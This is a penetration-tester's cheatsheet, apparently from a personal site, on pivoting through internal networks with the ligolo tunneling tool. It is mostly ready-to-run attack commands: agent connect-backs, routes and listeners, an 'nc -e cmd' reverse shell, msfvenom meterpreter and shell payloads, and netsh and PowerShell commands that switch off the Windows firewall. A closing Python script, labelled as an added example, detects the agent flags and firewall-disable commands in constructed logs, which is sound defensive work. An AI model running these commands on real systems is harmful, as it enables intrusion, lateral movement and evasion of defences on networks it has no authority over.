https://ph03n1x.net/ligolo-cheatsheet/

Local Port Forwarding to your Kali

When a website or service is reachable only from the target machine itself, you need local port forwarding. With ligolo you don't need proxychains.

# On your Kali terminal, create a new TUN interface called 'ligolo'
# It requires sudo rights
sudo ip tuntap add user <user> mode tun ligolo
sudo ip link set ligolo up
# when you need to delete it
sudo ip link del ligolo 

# Run the proxy on your Kali
./proxy -selfcert

# Connect the agent (on the target) to your proxy
.\agent.exe -connect $ip:port -ignore-cert

# select an agent session in proxy UI
session

# in proxy, select the new connection and attach it to ligolo
start --tun ligolo

# Add the magic route: traffic to 240.0.0.1 reaches ports bound to the agent's localhost, so all internal ports are accessible locally on Kali
sudo ip route add 240.0.0.1/32 dev ligolo

Example - Set up with your config

# tun0 IP (Kali VPN)
192.168.1.10

# 1st machine external IP
192.168.1.13

# 1st machine internal IP
10.10.10.10

# 2nd machine external IP
10.10.10.13

# 2nd machine internal IP
11.11.11.11

First pivot on First internal range

# 1. Create and bring up tunnel1 (Kali Terminal)
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

# 2. Start ligolo proxy server on kali with sudo
sudo ./proxy -selfcert

# 3. Upload agent and connect back to proxy
.\agent.exe -connect 192.168.45.176:11601 -ignore-cert # windows
./agent -connect 192.168.45.176:11601 -ignore-cert # linux

# in proxy, select agent session
session

# 4. Start the tunnel
start --tun ligolo 
# or just simply
start

# 5. Add route to the target subnet
sudo ip route add 10.10.10.0/24 dev ligolo

# 6. Add a listener on the first agent (forwards port 11601 on the agent to the proxy on Kali)
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

# 7. Test reachability
nxc smb 10.10.10.0/24

Second Pivot on Second internal range

# 1. Create and bring up tunnel2 (Kali Terminal)
sudo ip tuntap add user <user> mode tun tunnel2
sudo ip link set tunnel2 up

# 2. Connect new agent (from 2nd target) to 1st target internal IP
.\agent.exe -connect 10.10.10.10:11601 -ignore-cert

# 3. select new agent session in proxy
# make sure you are on the right connection
start --tun tunnel2

# 4. Add route to 2nd internal subnet
sudo ip route add 11.11.11.0/24 dev tunnel2

# 5. Add listeners for whitelisted ports
listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443 --tcp
listener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp

# 6. Download from 2nd target using 1st internal
wget http://10.10.10.10/wook -outfile wook

# 7. Catch reverse shell from 2nd target on your kali IP
nc64.exe 10.10.10.10 443 -e cmd

# 8. Test reachability on 2nd subnet
nxc smb 11.11.11.0/24

Reverse Shell

# Create a reverse shell file
# Remember to use MS01's IP, not the Attacker's IP
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$AGENT_IP LPORT=80 -f exe -o shell.exe

# Create a listener for file transfer in ligolo proxy
listener_add --addr 0.0.0.0:2222 --to 127.0.0.1:3333 --tcp

# Transfer the reverse shell payload to agent shell

# Transfer the reverse shell payload from agent shell to target shell

# Prepare listener in Kali
rlwrap nc -lvnp 3333

More Info about Reverse shell

<aside>

What if I want a reverse shell back from MS02 to my kali?

[Agent : corp.com\wook@MS01] » listener_add --addr 0.0.0.0:443 --to 0.0.0.0:443 --tcp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.1.20 LPORT=443 -f exe > rev.exe

# set up listener on kali

rlwrap nc -lvnp 443

# upload this file to MS02 and execute it. You should get a rev shell!

netsh advfirewall set allprofiles state off
# PowerShell equivalent
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

</aside>
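
Detection view of the commands above. This is an added example, not part of the original cheatsheet: it scans process-creation records for the agent flag pair and the firewall-disable commands shown on this page. The pipe-delimited log format, the rule names, the sample lines and the 192.0.2.x addresses are constructed for illustration.

```python
import re

# Rules built from command lines that appear on this page; rule names are this example's own.
RULES = {
    # Match on the flag pair, not the file name, so a renamed agent binary still hits.
    "tunnel_agent_flags": re.compile(
        r"^(?=.*\s-connect\s+\S+:\d+)(?=.*\s-ignore-cert\b)", re.I),
    "firewall_off_netsh": re.compile(
        r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off", re.I),
    "firewall_off_powershell": re.compile(
        r"Set-NetFirewallProfile\b.*-Enabled\s+\$?false\b", re.I),
}

# Constructed sample records: timestamp|host|command line
SAMPLE_LOG = r"""
2024-05-01T10:02:11Z|MS01|C:\Users\Public\agent.exe -connect 192.0.2.10:11601 -ignore-cert
2024-05-01T10:09:40Z|MS02|C:\ProgramData\svc.exe -ignore-cert -connect 192.0.2.20:11601
2024-05-01T10:11:05Z|MS02|netsh advfirewall set allprofiles state off
2024-05-01T10:11:30Z|MS02|powershell.exe -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
2024-05-01T10:12:00Z|MS01|netsh advfirewall show allprofiles
2024-05-01T10:13:00Z|MS01|ping.exe -n 1 192.0.2.20
""".strip().splitlines()

def scan(lines):
    """Return (timestamp, host, rule) for every rule a command line matches."""
    hits = []
    for line in lines:
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # skip malformed records instead of raising
        ts, host, cmdline = parts
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.append((ts, host, name))
    return hits

def hosts_with_tunnel_and_firewall_change(hits):
    """Hosts showing both a tunnel-agent hit and a firewall-off hit: triage these first."""
    by_host = {}
    for _, host, rule in hits:
        kind = "tunnel" if rule.startswith("tunnel") else "firewall"
        by_host.setdefault(host, set()).add(kind)
    return sorted(h for h, kinds in by_host.items() if kinds == {"tunnel", "firewall"})

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```
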